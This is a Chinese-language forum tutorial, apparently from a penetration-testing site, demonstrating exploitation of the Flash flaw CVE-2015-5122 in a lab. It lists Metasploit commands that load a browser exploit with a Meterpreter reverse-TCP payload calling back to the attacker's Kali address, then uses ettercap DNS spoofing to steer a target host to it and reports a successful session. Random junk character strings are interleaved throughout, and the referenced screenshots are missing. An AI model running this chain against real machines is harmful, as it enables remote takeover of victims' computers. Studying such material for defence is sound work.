0 I) b. ], ^- l' _0 X+ D 二、cve2015-5122漏洞实例演示虚拟机 ' w! |$ j, ^+ f! w( g) I$ K$ x& d
/ z1 R5 @- \1 }' ]% O0 C9 z$ m 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: w/ W! z3 i- T* ?! e0 E! U
search cve-2015-5122如图:
1 Z8 X5 i7 s; [3 ^: S& L
3 T6 {9 [- F' Z( x0 C! c) H: ]
0 g) {. |4 V! U 下面我们敲如下命令: " t& x0 R" u- _. J# o! K
6 ~/ r, i& Z/ \( H" ^. J use exploit/multi/browser/adobe_flash_opaque_background_uaf S" B5 y* \$ L% T
% y% ~6 j- b* o* \. q# B7 T Y3 w7 ]/ W A; e& q' h0 R set PAYLOAD windows/meterpreter/reverse_tcp
$ G' A0 _: ^7 z% k+ k2 @: i0 `: Lset LHOST 192.168.0.109 & ]/ ?: k9 q3 L
set URIPATH / /*根目录*/
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 ! B$ f1 v7 v: g5 U8 I
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ! g2 ^8 ?0 H2 {/ w* h
+ j5 _9 q) E5 g 然后show options如图: & p X3 ]' i$ k! k- A1 J
, \, Y" l# K1 n8 n3 v& @- q0 K$ T' R6 z$ y
) F, T5 T9 Y4 c# x: ~
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
/ K$ g; [8 P" I8 s0 t3 ]
: R7 e2 u* O3 F9 _
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
4 x/ y. |8 ?4 I Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
; P) x. l% u0 {! E: c
成功了,这时候我们断开ettercap,如图:
7 D* Y. W- n: T( e8 ?
Screenshot如图: 4 L; R2 z; }; H- g- [
* {6 `- w5 U" [. V/ p" e
7 E) u4 `; y' j1 S" ]0 l( o& U
6 t; O" E* b/ Z6 L) O
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |